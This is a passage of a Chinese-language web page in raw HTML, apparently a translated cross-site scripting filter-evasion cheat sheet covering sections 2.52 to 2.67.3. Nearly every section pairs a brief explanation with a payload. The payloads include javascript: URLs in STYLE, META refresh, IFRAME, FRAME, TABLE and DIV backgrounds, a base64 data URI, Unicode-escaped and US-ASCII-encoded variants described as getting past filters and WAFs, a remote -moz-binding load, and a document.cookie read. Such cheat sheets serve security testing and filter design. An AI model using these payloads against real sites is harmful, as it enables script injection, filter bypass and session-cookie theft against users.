这仅能在Gecko渲染引擎下有效并且需要在父页面绑定一个XML文件。具有讽刺意味的是 Netscape认为Gecko更安全 ,所以对绝大多数网站来说会受到漏洞影响:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.53.    含有分隔JavaScript的STYLE标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个XSS会在IE中造成无限循环:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.54.    STYLE属性中使用注释分隔表达式</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 由Roman Ivanov创建</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.55.    含表达式的IMG STYLE</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是一个将上面XSS攻击向量混合的方法,但确实展示了STYLE标签可以用相当复杂的方式分隔,和上面一样,也会让IE进入死循环:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> exp/*<A STYLE='no\xss:noxss("*//*");</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> xss:ex/*XSS*//*/*/pression(alert("XSS"))'></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.56.    STYLE标签(仅旧版本Netscape可用)</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE TYPE="text/javascript">alert('XSS');</STYLE></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.57.    使用背景图像的STYLE标签</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.58.    使用背景的STYLE标签</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.59.    含STYLE属性的HTML任意标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> IE6.0和IE渲染引擎模式下的Netscape 8.1+并不关心你建立的HTML标签是否存在,只要是由尖括号和字母开始的即可:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <XSS STYLE="behavior: url(xss.htc);"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.60.    本地htc文件</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这和上面两个跨站脚本攻击向量有些不同,因为它使用了一个必须和XSS攻击向量在相同服务器上的.htc文件。这个示例文件通过下载JavaScript并将其作为style属性的一部分运行来进行攻击:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <XSS STYLE="behavior: url(xss.htc);"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.61.    US-ASCII编码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> US-ASCII编码(由Kurt Huwig发现)。它使用了畸形的7位ASCII编码来代替8位。这个XSS攻击向量可以绕过大多数内容过滤器,但是只在主机使用US-ASCII编码传输数据时有效,或者可以自己设置编码格式。相对绕过服务器端过滤,这在绕过WAF跨站脚本过滤时候更有效。Apache Tomcat是目前唯一已知使用US-ASCII编码传输的:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> ¼script¾alert(¢XSS¢)¼/script¾</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.62.    META</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 关于meta刷新比较奇怪的是它并不会在头部中发送一个referrer-所以它通常用于不需要referrer的时候:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.62.1 使用数据的META</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> URL scheme指令。这个非常有用因为它并不包含任何可见的SCRIPT单词或JavaScript指令,因为它使用了base64编码.请查看RFC 2397寻找更多细节。你同样可以使用具有Base64编码功能的XSS工具来编码HTML或JavaScript:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.62.2 含有额外URL参数的META</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果目标站点尝试检查URL是否包含"http://",你可以用以下技术规避它(由Moritz Naumann提交):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.63.    IFRAME</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果允许Iframe那就会有很多XSS问题:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.64.    基于事件IFRAME</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Iframes和大多数其他元素可以使用下列事件(由David Cross提交):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IFRAME SRC=# οnmοuseοver="alert(document.cookie)"></IFRAME></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.65.    FRAME</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Frames和iframe一样有很多XSS问题:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.66.    TABLE</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <TABLE BACKGROUND="javascript:alert('XSS')"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.66.1. TD</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 和上面一样,TD也可以通过BACKGROUND来包含JavaScriptXSS攻击向量:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.67.    DIV</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.67.1. DIV背景图像</span></p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.67.2. 含有Unicode XSS利用代码的DIV背景图像</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这进行了一些修改来混淆URL参数。原始的漏洞是由RenaudLifchitz在Hotmail发现的:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.67.3. 含有额外字符的DIV背景图像</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; 